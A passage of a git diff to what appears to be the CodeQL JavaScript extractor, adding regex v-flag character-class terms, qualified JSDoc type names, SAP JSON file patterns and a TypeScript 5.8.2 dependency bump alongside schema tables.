+@union_or_intersection_type = @union_type | @intersection_type; +@typevariable_type = @canonical_type_variable_type | @lexical_type_variable_type; + +has_asserts_keyword(int node: @predicate_typeexpr ref); + +@typed_ast_node = @expr | @typeexpr | @function; +ast_node_type( + unique int node: @typed_ast_node ref, + int typ: @type ref); + +declared_function_signature( + unique int node: @function ref, + int sig: @signature_type ref +); + +invoke_expr_signature( + unique int node: @invokeexpr ref, + int sig: @signature_type ref +); + +invoke_expr_overload_index( + unique int node: @invokeexpr ref, + int index: int ref +); + +symbols ( + unique int id: @symbol, + int kind: int ref, + varchar(900) name: string ref +); + +symbol_parent ( + unique int symbol: @symbol ref, + int parent: @symbol ref +); + +symbol_module ( + int symbol: @symbol ref, + varchar(900) moduleName: string ref +); + +symbol_global ( + int symbol: @symbol ref, + varchar(900) globalName: string ref +); + +case @symbol.kind of + 0 = @root_symbol +| 1 = @member_symbol +| 2 = @other_symbol +; + +@type_with_symbol = @type_reference | @typevariable_type | @typeof_type | @unique_symbol_type; +@ast_node_with_symbol = @type_definition | @namespace_definition | @toplevel | @typeaccess | @namespace_access | @var_decl | @function | @invokeexpr | @import_declaration | @external_module_reference | @external_module_declaration; + +ast_node_symbol( + unique int node: @ast_node_with_symbol ref, + int symbol: @symbol ref); + +type_symbol( + unique int typ: @type_with_symbol ref, + int symbol: @symbol ref); + +#keyset[typ, name] +type_property( + int typ: @type ref, + varchar(900) name: string ref, + int propertyType: @type ref); + +type_alias( + unique int aliasType: @type ref, + int underlyingType: @type ref); + +@literal_type = @string_literal_type | @number_literal_type | @boolean_literal_type | @bigint_literal_type; +@type_with_literal_value = @string_literal_type | @number_literal_type | @bigint_literal_type; +type_literal_value( + unique int typ: @type_with_literal_value ref, + varchar(900) value: string ref); + +signature_types ( + unique int id: @signature_type, + int kind: int ref, + varchar(900) tostring: string ref, + int type_parameters: int ref, + int required_params: int ref +); + +is_abstract_signature( + unique int sig: @signature_type ref +); + +signature_rest_parameter( + unique int sig: @signature_type ref, + int rest_param_arra_type: @type ref +); + +case @signature_type.kind of + 0 = @function_signature_type +| 1 = @constructor_signature_type +; + +#keyset[typ, kind, index] +type_contains_signature ( + int typ: @type ref, + int kind: int ref, // constructor/call/index + int index: int ref, // ordering of overloaded signatures + int sig: @signature_type ref +); + +#keyset[parent, index] +signature_contains_type ( + int child: @type ref, + int parent: @signature_type ref, + int index: int ref +); + +#keyset[sig, index] +signature_parameter_name ( + int sig: @signature_type ref, + int index: int ref, + varchar(900) name: string ref +); + +number_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +string_index_type ( + unique int baseType: @type ref, + int propertyType: @type ref +); + +base_type_names( + int typeName: @symbol ref, + int baseTypeName: @symbol ref +); + +self_types( + int typeName: @symbol ref, + int selfType: @type_reference ref +); + +tuple_type_min_length( + unique int typ: @type ref, + int minLength: int ref +); + +tuple_type_rest_index( + unique int typ: @type ref, + int index: int ref +); + +// comments +comments (unique int id: @comment, + int kind: int ref, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(900) tostring: string ref); + +case @comment.kind of + 0 = @slashslash_comment +| 1 = @slashstar_comment +| 2 = @doc_comment +| 3 = @html_comment_start +| 4 = @htmlcommentend; + +@html_comment = @html_comment_start | @htmlcommentend; +@line_comment = @slashslash_comment | @html_comment; +@block_comment = @slashstar_comment | @doc_comment; + +// source lines +lines (unique int id: @line, + int toplevel: @toplevel ref, + varchar(900) text: string ref, + varchar(2) terminator: string ref); +indentation (int file: @file ref, + int lineno: int ref, + varchar(1) indentChar: string ref, + int indentDepth: int ref); + +// JavaScript parse errors +js_parse_errors (unique int id: @js_parse_error, + int toplevel: @toplevel ref, + varchar(900) message: string ref, + varchar(900) line: string ref); + +// regular expressions +#keyset[parent, idx] +regexpterm (unique int id: @regexpterm, + int kind: int ref, + int parent: @regexpparent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +@regexpparent = @regexpterm | @regexp_literal | @string_literal | @add_expr; + +case @regexpterm.kind of + 0 = @regexp_alt +| 1 = @regexp_seq +| 2 = @regexp_caret +| 3 = @regexp_dollar +| 4 = @regexp_wordboundary +| 5 = @regexp_nonwordboundary +| 6 = @regexp_positive_lookahead +| 7 = @regexp_negative_lookahead +| 8 = @regexp_star +| 9 = @regexp_plus +| 10 = @regexp_opt +| 11 = @regexp_range +| 12 = @regexp_dot +| 13 = @regexp_group +| 14 = @regexp_normal_constant +| 15 = @regexp_hex_escape +| 16 = @regexp_unicode_escape +| 17 = @regexp_dec_escape +| 18 = @regexp_oct_escape +| 19 = @regexp_ctrl_escape +| 20 = @regexp_char_class_escape +| 21 = @regexp_id_escape +| 22 = @regexp_backref +| 23 = @regexp_char_class +| 24 = @regexp_char_range +| 25 = @regexp_positive_lookbehind +| 26 = @regexp_negative_lookbehind +| 27 = @regexp_unicode_property_escape +| 28 = @regexp_quoted_string +| 29 = @regexp_intersection +| 30 = @regexp_subtraction; + +regexp_parse_errors (unique int id: @regexp_parse_error, + int regexp: @regexpterm ref, + varchar(900) message: string ref); + +@regexp_quantifier = @regexp_star | @regexp_plus | @regexp_opt | @regexp_range; +@regexp_escape = @regexp_char_escape | @regexp_char_class_escape | @regexp_unicode_property_escape; +@regexp_char_escape = @regexp_hex_escape | @regexp_unicode_escape | @regexp_dec_escape | @regexp_oct_escape | @regexp_ctrl_escape | @regexp_id_escape; +@regexp_constant = @regexp_normal_constant | @regexp_char_escape; +@regexp_lookahead = @regexp_positive_lookahead | @regexp_negative_lookahead; +@regexp_lookbehind = @regexp_positive_lookbehind | @regexp_negative_lookbehind; +@regexp_subpattern = @regexp_lookahead | @regexp_lookbehind; +@regexp_anchor = @regexp_dollar | @regexp_caret; + +is_greedy (int id: @regexp_quantifier ref); +range_quantifier_lower_bound (unique int id: @regexp_range ref, int lo: int ref); +range_quantifier_upper_bound (unique int id: @regexp_range ref, int hi: int ref); +is_capture (unique int id: @regexp_group ref, int number: int ref); +is_named_capture (unique int id: @regexp_group ref, string name: string ref); +is_inverted (int id: @regexp_char_class ref); +regexp_const_value (unique int id: @regexp_constant ref, varchar(1) value: string ref); +char_class_escape (unique int id: @regexp_char_class_escape ref, varchar(1) value: string ref); +backref (unique int id: @regexp_backref ref, int value: int ref); +named_backref (unique int id: @regexp_backref ref, string name: string ref); +unicode_property_escapename (unique int id: @regexp_unicode_property_escape ref, string name: string ref); +unicode_property_escapevalue (unique int id: @regexp_unicode_property_escape ref, string value: string ref); + +// tokens +#keyset[toplevel, idx] +tokeninfo (unique int id: @token, + int kind: int ref, + int toplevel: @toplevel ref, + int idx: int ref, + varchar(900) value: string ref); + +case @token.kind of + 0 = @token_eof +| 1 = @token_null_literal +| 2 = @token_boolean_literal +| 3 = @token_numeric_literal +| 4 = @token_string_literal +| 5 = @token_regular_expression +| 6 = @token_identifier +| 7 = @token_keyword +| 8 = @token_punctuator; + +// associate comments with the token immediately following them (which may be EOF) +next_token (int comment: @comment ref, int token: @token ref); + +// JSON +#keyset[parent, idx] +json (unique int id: @json_value, + int kind: int ref, + int parent: @json_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); + +json_literals (varchar(900) value: string ref, + varchar(900) raw: string ref, + unique int expr: @json_value ref); + +json_properties (int obj: @json_object ref, + varchar(900) property: string ref, + int value: @json_value ref); + +json_errors (unique int id: @json_parse_error, + varchar(900) message: string ref); + +json_locations(unique int locatable: @json_locatable ref, + int location: @location_default ref); + +case @json_value.kind of + 0 = @json_null +| 1 = @json_boolean +| 2 = @json_number +| 3 = @json_string +| 4 = @json_array +| 5 = @json_object; + +@json_parent = @json_object | @json_array | @file; + +@json_locatable = @json_value | @json_parse_error; + +// locations +@ast_node = @toplevel | @stmt | @expr | @property | @typeexpr; + +@locatable = @file + | @ast_node + | @comment + | @line + | @js_parse_error | @regexp_parse_error + | @regexpterm + | @json_locatable + | @token + | @cfg_node + | @jsdoc | @jsdoc_type_expr | @jsdoc_tag + | @yaml_locatable + | @xmllocatable + | @configLocatable + | @template_placeholder_tag; + +hasLocation (unique int locatable: @locatable ref, + int location: @location ref); + +// CFG +entry_cfg_node (unique int id: @entry_node, int container: @stmt_container ref); +exit_cfg_node (unique int id: @exit_node, int container: @stmt_container ref); +guard_node (unique int id: @guard_node, int kind: int ref, int test: @expr ref); +case @guard_node.kind of + 0 = @falsy_guard +| 1 = @truthy_guard; +@condition_guard = @falsy_guard | @truthy_guard; + +@synthetic_cfg_node = @entry_node | @exit_node | @guard_node; +@cfg_node = @synthetic_cfg_node | @expr_parent; + +successor (int pred: @cfg_node ref, int succ: @cfg_node ref); + +// JSDoc comments +jsdoc (unique int id: @jsdoc, varchar(900) description: string ref, int comment: @comment ref); +#keyset[parent, idx] +jsdoc_tags (unique int id: @jsdoc_tag, varchar(900) title: string ref, + int parent: @jsdoc ref, int idx: int ref, varchar(900) tostring: string ref); +jsdoc_tag_descriptions (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); +jsdoc_tag_names (unique int tag: @jsdoc_tag ref, varchar(900) text: string ref); + +#keyset[parent, idx] +jsdoc_type_exprs (unique int id: @jsdoc_type_expr, + int kind: int ref, + int parent: @jsdoc_type_expr_parent ref, + int idx: int ref, + varchar(900) tostring: string ref); +case @jsdoc_type_expr.kind of + 0 = @jsdoc_any_type_expr +| 1 = @jsdoc_null_type_expr +| 2 = @jsdoc_undefined_type_expr +| 3 = @jsdoc_unknown_type_expr +| 4 = @jsdoc_void_type_expr +| 5 = @jsdoc_named_type_expr +| 6 = @jsdoc_applied_type_expr +| 7 = @jsdoc_nullable_type_expr +| 8 = @jsdoc_non_nullable_type_expr +| 9 = @jsdoc_record_type_expr +| 10 = @jsdoc_array_type_expr +| 11 = @jsdoc_union_type_expr +| 12 = @jsdoc_function_type_expr +| 13 = @jsdoc_optional_type_expr +| 14 = @jsdoc_rest_type_expr +; + +#keyset[id, idx] +jsdoc_record_field_name (int id: @jsdoc_record_type_expr ref, int idx: int ref, varchar(900) name: string ref); +jsdoc_prefix_qualifier (int id: @jsdoc_type_expr ref); +jsdoc_has_new_parameter (int fn: @jsdoc_function_type_expr ref); + +@jsdoc_type_expr_parent = @jsdoc_type_expr | @jsdoc_tag; + +jsdoc_errors (unique int id: @jsdoc_error, int tag: @jsdoc_tag ref, varchar(900) message: string ref, varchar(900) tostring: string ref); + +@dataflownode = @expr | @function_decl_stmt | @class_decl_stmt | @namespace_declaration | @enum_declaration | @property; + +@optionalchainable = @call_expr | @propaccess; + +isOptionalChaining(int id: @optionalchainable ref); + +/** + * The time taken for the extraction of a file. + * This table contains non-deterministic content. + * + * The sum of the `time` column for each (`file`, `timerKind`) pair + * is the total time taken for extraction of `file`. The `extractionPhase` + * column provides a granular view of the extraction time of the file. + */ +extraction_time( + int file : @file ref, + // see `com.semmle.js.extractor.ExtractionMetrics.ExtractionPhase`. + int extractionPhase: int ref, + // 0 for the elapsed CPU time in nanoseconds, 1 for the elapsed wallclock time in nanoseconds + int timerKind: int ref, + float time: float ref +) + +/** +* Non-timing related data for the extraction of a single file. +* This table contains non-deterministic content. +*/ +extraction_data( + int file : @file ref, + // the absolute path to the cache file + varchar(900) cacheFile: string ref, + boolean fromCache: boolean ref, + int length: int ref +) + +/*- YAML -*/ + +#keyset[parent, idx] +yaml (unique int id: @yaml_node, + int kind: int ref, + int parent: @yaml_node_parent ref, + int idx: int ref, + string tag: string ref, + string tostring: string ref); + +case @yaml_node.kind of + 0 = @yaml_scalar_node +| 1 = @yaml_mapping_node +| 2 = @yaml_sequence_node +| 3 = @yaml_alias_node +; + +@yaml_collection_node = @yaml_mapping_node | @yaml_sequence_node; + +@yaml_node_parent = @yaml_collection_node | @file; + +yaml_anchors (unique int node: @yaml_node ref, + string anchor: string ref); + +yaml_aliases (unique int alias: @yaml_alias_node ref, + string target: string ref); + +yaml_scalars (unique int scalar: @yaml_scalar_node ref, + int style: int ref, + string value: string ref); + +yaml_errors (unique int id: @yaml_error, + string message: string ref); + +yaml_locations(unique int locatable: @yaml_locatable ref, + int location: @location_default ref); + +@yaml_locatable = @yaml_node | @yaml_error; + +/*- XML Files -*/ + +xmlEncoding( + unique int id: @file ref, + string encoding: string ref +); + +xmlDTDs( + unique int id: @xmldtd, + string root: string ref, + string publicId: string ref, + string systemId: string ref, + int fileid: @file ref +); + +xmlElements( + unique int id: @xmlelement, + string name: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int fileid: @file ref +); + +xmlAttrs( + unique int id: @xmlattribute, + int elementid: @xmlelement ref, + string name: string ref, + string value: string ref, + int idx: int ref, + int fileid: @file ref +); + +xmlNs( + int id: @xmlnamespace, + string prefixName: string ref, + string URI: string ref, + int fileid: @file ref +); + +xmlHasNs( + int elementId: @xmlnamespaceable ref, + int nsId: @xmlnamespace ref, + int fileid: @file ref +); + +xmlComments( + unique int id: @xmlcomment, + string text: string ref, + int parentid: @xmlparent ref, + int fileid: @file ref +); + +xmlChars( + unique int id: @xmlcharacters, + string text: string ref, + int parentid: @xmlparent ref, + int idx: int ref, + int isCDATA: int ref, + int fileid: @file ref +); + +@xmlparent = @file | @xmlelement; +@xmlnamespaceable = @xmlelement | @xmlattribute; + +xmllocations( + int xmlElement: @xmllocatable ref, + int location: @location_default ref +); + +@xmllocatable = @xmlcharacters | @xmlelement | @xmlcomment | @xmlattribute | @xmldtd | @file | @xmlnamespace; + +/*- Configuration files with key value pairs -*/ + +configs( + unique int id: @config +); + +configNames( + unique int id: @configName, + int config: @config ref, + string name: string ref +); + +configValues( + unique int id: @configValue, + int config: @config ref, + string value: string ref +); + +configLocations( + int locatable: @configLocatable ref, + int location: @location_default ref +); + +@configLocatable = @config | @configName | @configValue; diff --git a/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/upgrade.properties b/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/upgrade.properties new file mode 100644 index 000000000000..d67984c6ef9e --- /dev/null +++ b/javascript/downgrades/ccefb5e2d49318eea4aeafd4c6ae2af9f94ac72a/upgrade.properties @@ -0,0 +1,4 @@ +description: split up qualified names in jsdoc type exprs +compatibility: backwards + +jsdoc_type_exprs.rel: run jsdoc_type_exprs.ql diff --git a/javascript/extractor/lib/typescript/package-lock.json b/javascript/extractor/lib/typescript/package-lock.json index 1978e3963246..389cc1d2a5b8 100644 --- a/javascript/extractor/lib/typescript/package-lock.json +++ b/javascript/extractor/lib/typescript/package-lock.json @@ -6,7 +6,7 @@ "": { "name": "typescript-parser-wrapper", "dependencies": { - "typescript": "^5.7.2" + "typescript": "^5.8.2" }, "devDependencies": { "@types/node": "18.15.3" @@ -20,9 +20,9 @@ "license": "MIT" }, "node_modules/typescript": { - "version": "5.7.2", - "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.7.2.tgz", - "integrity": "sha512-i5t66RHxDvVN40HfDd1PsEThGNnlMCMT3jMUuoh9/0TaqWevNontacunWyN02LA9/fIbEWlcHZcgTKb9QoaLfg==", + "version": "5.8.2", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.8.2.tgz", + "integrity": "sha512-aJn6wq13/afZp/jT9QZmwEjDqqvSGp1VT5GVg+f/t6/oVyrgXM6BY1h9BRh/O5p3PlUPAe+WuiEZOmb/49RqoQ==", "license": "Apache-2.0", "bin": { "tsc": "bin/tsc", diff --git a/javascript/extractor/lib/typescript/package.json b/javascript/extractor/lib/typescript/package.json index 9d77f4ab740a..7e0c5fd160d0 100644 --- a/javascript/extractor/lib/typescript/package.json +++ b/javascript/extractor/lib/typescript/package.json @@ -2,7 +2,7 @@ "name": "typescript-parser-wrapper", "private": true, "dependencies": { - "typescript": "^5.7.2" + "typescript": "^5.8.2" }, "scripts": { "build": "tsc --project tsconfig.json", diff --git a/javascript/extractor/src/com/semmle/js/ast/MemberExpression.java b/javascript/extractor/src/com/semmle/js/ast/MemberExpression.java index 5d90a70f04fc..b540decd48e7 100644 --- a/javascript/extractor/src/com/semmle/js/ast/MemberExpression.java +++ b/javascript/extractor/src/com/semmle/js/ast/MemberExpression.java @@ -69,4 +69,9 @@ public int getSymbol() { public void setSymbol(int symbol) { this.symbol = symbol; } + + @Override + public boolean isValidTypeExpression() { + return object instanceof ITypeExpression && ((ITypeExpression)object).isValidTypeExpression() || object instanceof DynamicImport; + } } diff --git a/javascript/extractor/src/com/semmle/js/ast/jsdoc/Identifier.java b/javascript/extractor/src/com/semmle/js/ast/jsdoc/Identifier.java new file mode 100644 index 000000000000..09b393e2d4cd --- /dev/null +++ b/javascript/extractor/src/com/semmle/js/ast/jsdoc/Identifier.java @@ -0,0 +1,28 @@ +package com.semmle.js.ast.jsdoc; + +import com.semmle.js.ast.SourceLocation; + +/** An identifier in a JSDoc type. */ +public class Identifier extends JSDocTypeExpression { + private final String name; + + public Identifier(SourceLocation loc, String name) { + super(loc, "Identifier"); + this.name = name; + } + + @Override + public void accept(Visitor v) { + v.visit(this); + } + + /** The type name. */ + public String getName() { + return name; + } + + @Override + public String pp() { + return name; + } +} diff --git a/javascript/extractor/src/com/semmle/js/ast/jsdoc/NameExpression.java b/javascript/extractor/src/com/semmle/js/ast/jsdoc/NameExpression.java deleted file mode 100644 index 94db5d324451..000000000000 --- a/javascript/extractor/src/com/semmle/js/ast/jsdoc/NameExpression.java +++ /dev/null @@ -1,28 +0,0 @@ -package com.semmle.js.ast.jsdoc; - -import com.semmle.js.ast.SourceLocation; - -/** A named JSDoc type. */ -public class NameExpression extends JSDocTypeExpression { - private final String name; - - public NameExpression(SourceLocation loc, String name) { - super(loc, "NameExpression"); - this.name = name; - } - - @Override - public void accept(Visitor v) { - v.visit(this); - } - - /** The type name. */ - public String getName() { - return name; - } - - @Override - public String pp() { - return name; - } -} diff --git a/javascript/extractor/src/com/semmle/js/ast/jsdoc/QualifiedNameExpression.java b/javascript/extractor/src/com/semmle/js/ast/jsdoc/QualifiedNameExpression.java new file mode 100644 index 000000000000..93bebc6a3584 --- /dev/null +++ b/javascript/extractor/src/com/semmle/js/ast/jsdoc/QualifiedNameExpression.java @@ -0,0 +1,35 @@ +package com.semmle.js.ast.jsdoc; + +import com.semmle.js.ast.SourceLocation; + +/** A qualified name in a JSDoc type. */ +public class QualifiedNameExpression extends JSDocTypeExpression { + private final JSDocTypeExpression base; + private final Identifier name; + + public QualifiedNameExpression(SourceLocation loc, JSDocTypeExpression base, Identifier name) { + super(loc, "QualifiedNameExpression"); + this.base = base; + this.name = name; + } + + @Override + public void accept(Visitor v) { + v.visit(this); + } + + /** Returns the expression on the left side of the dot character. */ + public JSDocTypeExpression getBase() { + return base; + } + + /** Returns the identifier on the right-hand side of the dot character. */ + public Identifier getNameNode() { + return name; + } + + @Override + public String pp() { + return base.pp() + "." + name.pp(); + } +} diff --git a/javascript/extractor/src/com/semmle/js/ast/jsdoc/Visitor.java b/javascript/extractor/src/com/semmle/js/ast/jsdoc/Visitor.java index 48a2edda1e74..571a3ed9a625 100644 --- a/javascript/extractor/src/com/semmle/js/ast/jsdoc/Visitor.java +++ b/javascript/extractor/src/com/semmle/js/ast/jsdoc/Visitor.java @@ -10,7 +10,9 @@ public interface Visitor { public void visit(JSDocTag nd); - public void visit(NameExpression nd); + public void visit(Identifier nd); + + public void visit(QualifiedNameExpression nd); public void visit(NullableLiteral nd); diff --git a/javascript/extractor/src/com/semmle/js/ast/regexp/CharacterClassIntersection.java b/javascript/extractor/src/com/semmle/js/ast/regexp/CharacterClassIntersection.java new file mode 100644 index 000000000000..5f4917363f56 --- /dev/null +++ b/javascript/extractor/src/com/semmle/js/ast/regexp/CharacterClassIntersection.java @@ -0,0 +1,26 @@ +package com.semmle.js.ast.regexp; + +import com.semmle.js.ast.SourceLocation; +import java.util.List; + +/** + * A character class intersection in a regular expression available only with the `v` flag. + * Example: [[abc]&&[ab]&&[b]] matches character `b` only. + */ +public class CharacterClassIntersection extends RegExpTerm { + private final List elements; + + public CharacterClassIntersection(SourceLocation loc, List elements) { + super(loc, "CharacterClassIntersection"); + this.elements = elements; + } + + @Override + public void accept(Visitor v) { + v.visit(this); + } + + public List getElements() { + return elements; + } +} diff --git a/javascript/extractor/src/com/semmle/js/ast/regexp/CharacterClassQuotedString.java b/javascript/extractor/src/com/semmle/js/ast/regexp/CharacterClassQuotedString.java new file mode 100644 index 000000000000..f4a937b70eb3 --- /dev/null +++ b/javascript/extractor/src/com/semmle/js/ast/regexp/CharacterClassQuotedString.java @@ -0,0 +1,28 @@ +package com.semmle.js.ast.regexp; + +import com.semmle.js.ast.SourceLocation; + +/** + * A quoted string escape sequence '\q{}' in a regular expression. + * This feature is a non-standard extension that requires the 'v' flag. + * + * Example: [\q{abc|def}] creates a character class that matches either the string + * "abc" or "def". Within the quoted string, only the alternation operator '|' is supported. + */ +public class CharacterClassQuotedString extends RegExpTerm { + private final RegExpTerm term; + + public CharacterClassQuotedString(SourceLocation loc, RegExpTerm term) { + super(loc, "CharacterClassQuotedString"); + this.term = term; + } + + public RegExpTerm getTerm() { + return term; + } + + @Override + public void accept(Visitor v) { + v.visit(this); + } +} diff --git a/javascript/extractor/src/com/semmle/js/ast/regexp/CharacterClassSubtraction.java b/javascript/extractor/src/com/semmle/js/ast/regexp/CharacterClassSubtraction.java new file mode 100644 index 000000000000..07f37f6bb1da --- /dev/null +++ b/javascript/extractor/src/com/semmle/js/ast/regexp/CharacterClassSubtraction.java @@ -0,0 +1,26 @@ +package com.semmle.js.ast.regexp; + +import com.semmle.js.ast.SourceLocation; +import java.util.List; + +/** + * A character class subtraction in a regular expression available only with the `v` flag. + * Example: [[abc]--[a]--[b]] matches character `c` only. + */ +public class CharacterClassSubtraction extends RegExpTerm { + private final List elements; + + public CharacterClassSubtraction(SourceLocation loc, List elements) { + super(loc, "CharacterClassSubtraction"); + this.elements = elements; + } + + @Override + public void accept(Visitor v) { + v.visit(this); + } + + public List getElements() { + return elements; + } +} diff --git a/javascript/extractor/src/com/semmle/js/ast/regexp/Visitor.java b/javascript/extractor/src/com/semmle/js/ast/regexp/Visitor.java index 3671a55694be..373cb727c5a6 100644 --- a/javascript/extractor/src/com/semmle/js/ast/regexp/Visitor.java +++ b/javascript/extractor/src/com/semmle/js/ast/regexp/Visitor.java @@ -61,4 +61,10 @@ public interface Visitor { public void visit(ZeroWidthNegativeLookbehind nd); public void visit(UnicodePropertyEscape nd); + + public void visit(CharacterClassQuotedString nd); + + public void visit(CharacterClassIntersection nd); + + public void visit(CharacterClassSubtraction nd); } diff --git a/javascript/extractor/src/com/semmle/js/extractor/ASTExtractor.java b/javascript/extractor/src/com/semmle/js/extractor/ASTExtractor.java index 0dc00f79ab03..5625a9f1211c 100644 --- a/javascript/extractor/src/com/semmle/js/extractor/ASTExtractor.java +++ b/javascript/extractor/src/com/semmle/js/extractor/ASTExtractor.java @@ -600,7 +600,7 @@ public Label visit(Literal nd, Context c) { SourceMap sourceMap = SourceMap.legacyWithStartPos( SourceMap.fromString(nd.getRaw()).offsetBy(0, offsets), startPos); - regexpExtractor.extract(source.substring(1, source.lastIndexOf('/')), sourceMap, nd, false); + regexpExtractor.extract(source.substring(1, source.lastIndexOf('/')), sourceMap, nd, false, source.substring(source.lastIndexOf('/'), source.length())); } else if (nd.isStringLiteral() && !c.isInsideType() && nd.getRaw().length() < 1000 diff --git a/javascript/extractor/src/com/semmle/js/extractor/AutoBuild.java b/javascript/extractor/src/com/semmle/js/extractor/AutoBuild.java index 0d5fa5619109..49b22ddcd2d4 100644 --- a/javascript/extractor/src/com/semmle/js/extractor/AutoBuild.java +++ b/javascript/extractor/src/com/semmle/js/extractor/AutoBuild.java @@ -160,6 +160,9 @@ * is of the form "codeql-javascript-*.json". *
  • JavaScript, JSON or YAML files whose base name starts with ".eslintrc". *
  • JSON files whose base name is ".xsaccess". + *
  • JSON files whose base name is "xs-app.json". + *
  • JSON files whose base name ends with ".view.json". + *
  • JSON files whose base name is "manifest.json". *
  • All extension-less files. * * @@ -394,10 +397,12 @@ private void setupFilters() { for (FileType filetype : defaultExtract) for (String extension : filetype.getExtensions()) patterns.add("**/*" + extension); - // include .eslintrc files, .xsaccess files, package.json files, - // tsconfig.json files, and codeql-javascript-*.json files + // include JSON files which are relevant to our analysis patterns.add("**/.eslintrc*"); - patterns.add("**/.xsaccess"); + patterns.add("**/.xsaccess"); // SAP XSJS + patterns.add("**/xs-app.json"); // SAP XSJS + patterns.add("**/*.view.json"); // SAP UI5 + patterns.add("**/manifest.json"); patterns.add("**/package.json"); patterns.add("**/tsconfig*.json"); patterns.add("**/codeql-javascript-*.json"); diff --git a/javascript/extractor/src/com/semmle/js/extractor/JSDocExtractor.java b/javascript/extractor/src/com/semmle/js/extractor/JSDocExtractor.java index 86d1e1f6f79d..2e951414733b 100644 --- a/javascript/extractor/src/com/semmle/js/extractor/JSDocExtractor.java +++ b/javascript/extractor/src/com/semmle/js/extractor/JSDocExtractor.java @@ -9,13 +9,14 @@ import com.semmle.js.ast.jsdoc.JSDocElement; import com.semmle.js.ast.jsdoc.JSDocTag; import com.semmle.js.ast.jsdoc.JSDocTypeExpression; -import com.semmle.js.ast.jsdoc.NameExpression; +import com.semmle.js.ast.jsdoc.Identifier; import com.semmle.js.ast.jsdoc.NonNullableType; import com.semmle.js.ast.jsdoc.NullLiteral; import com.semmle.js.ast.jsdoc.NullableLiteral; import com.semmle.js.ast.jsdoc.NullableType; import com.semmle.js.ast.jsdoc.OptionalType; import com.semmle.js.ast.jsdoc.ParameterType; +import com.semmle.js.ast.jsdoc.QualifiedNameExpression; import com.semmle.js.ast.jsdoc.RecordType; import com.semmle.js.ast.jsdoc.RestType; import com.semmle.js.ast.jsdoc.TypeApplication; @@ -42,7 +43,7 @@ public class JSDocExtractor { jsdocTypeExprKinds.put("UndefinedLiteral", 2); jsdocTypeExprKinds.put("NullableLiteral", 3); jsdocTypeExprKinds.put("VoidLiteral", 4); - jsdocTypeExprKinds.put("NameExpression", 5); + jsdocTypeExprKinds.put("Identifier", 5); jsdocTypeExprKinds.put("TypeApplication", 6); jsdocTypeExprKinds.put("NullableType", 7); jsdocTypeExprKinds.put("NonNullableType", 8); @@ -52,6 +53,7 @@ public class JSDocExtractor { jsdocTypeExprKinds.put("FunctionType", 12); jsdocTypeExprKinds.put("OptionalType", 13); jsdocTypeExprKinds.put("RestType", 14); + jsdocTypeExprKinds.put("QualifiedNameExpression", 15); } private final TrapWriter trapwriter; @@ -122,10 +124,17 @@ public void visit(RecordType nd) { } @Override - public void visit(NameExpression nd) { + public void visit(Identifier nd) { visit((JSDocTypeExpression) nd); } + @Override + public void visit(QualifiedNameExpression nd) { + Label label = visit((JSDocTypeExpression) nd); + visit(nd.getBase(), label, 0); + visit(nd.getNameNode(), label, 1); + } + @Override public void visit(NullableLiteral nd) { visit((JSDocTypeExpression) nd); diff --git a/javascript/extractor/src/com/semmle/js/extractor/Main.java b/javascript/extractor/src/com/semmle/js/extractor/Main.java index 56e4e42dc543..0b92711b01da 100644 --- a/javascript/extractor/src/com/semmle/js/extractor/Main.java +++ b/javascript/extractor/src/com/semmle/js/extractor/Main.java @@ -42,7 +42,7 @@ public class Main { * A version identifier that should be updated every time the extractor changes in such a way that * it may produce different tuples for the same file under the same {@link ExtractorConfig}. */ - public static final String EXTRACTOR_VERSION = "2025-02-03"; + public static final String EXTRACTOR_VERSION = "2025-03-20"; public static final Pattern NEWLINE = Pattern.compile("\n"); diff --git a/javascript/extractor/src/com/semmle/js/extractor/RegExpExtractor.java b/javascript/extractor/src/com/semmle/js/extractor/RegExpExtractor.java index 41d7d446cfe3..0731f8a7c0f5 100644 --- a/javascript/extractor/src/com/semmle/js/extractor/RegExpExtractor.java +++ b/javascript/extractor/src/com/semmle/js/extractor/RegExpExtractor.java @@ -10,7 +10,9 @@ import com.semmle.js.ast.regexp.Caret; import com.semmle.js.ast.regexp.CharacterClass; import com.semmle.js.ast.regexp.CharacterClassEscape; +import com.semmle.js.ast.regexp.CharacterClassQuotedString; import com.semmle.js.ast.regexp.CharacterClassRange; +import com.semmle.js.ast.regexp.CharacterClassSubtraction; import com.semmle.js.ast.regexp.Constant; import com.semmle.js.ast.regexp.ControlEscape; import com.semmle.js.ast.regexp.ControlLetter; @@ -22,6 +24,7 @@ import com.semmle.js.ast.regexp.Group; import com.semmle.js.ast.regexp.HexEscapeSequence; import com.semmle.js.ast.regexp.IdentityEscape; +import com.semmle.js.ast.regexp.CharacterClassIntersection; import com.semmle.js.ast.regexp.Literal; import com.semmle.js.ast.regexp.NamedBackReference; import com.semmle.js.ast.regexp.NonWordBoundary; @@ -92,6 +95,9 @@ public RegExpExtractor(TrapWriter trapwriter, LocationManager locationManager) { termkinds.put("ZeroWidthPositiveLookbehind", 25); termkinds.put("ZeroWidthNegativeLookbehind", 26); termkinds.put("UnicodePropertyEscape", 27); + termkinds.put("CharacterClassQuotedString", 28); + termkinds.put("CharacterClassIntersection", 29); + termkinds.put("CharacterClassSubtraction", 30); } private static final String[] errmsgs = @@ -344,10 +350,32 @@ public void visit(CharacterClassRange nd) { visit(nd.getLeft(), lbl, 0); visit(nd.getRight(), lbl, 1); } + + @Override + public void visit(CharacterClassQuotedString nd) { + Label lbl = extractTerm(nd, parent, idx); + visit(nd.getTerm(), lbl, 0); + } + + @Override + public void visit(CharacterClassIntersection nd) { + Label lbl = extractTerm(nd, parent, idx); + int i = 0; + for (RegExpTerm element : nd.getElements()) + visit(element, lbl, i++); + } + + @Override + public void visit(CharacterClassSubtraction nd) { + Label lbl = extractTerm(nd, parent, idx); + int i = 0; + for (RegExpTerm element : nd.getElements()) + visit(element, lbl, i++); + } } - public void extract(String src, SourceMap sourceMap, Node parent, boolean isSpeculativeParsing) { - Result res = parser.parse(src); + public void extract(String src, SourceMap sourceMap, Node parent, boolean 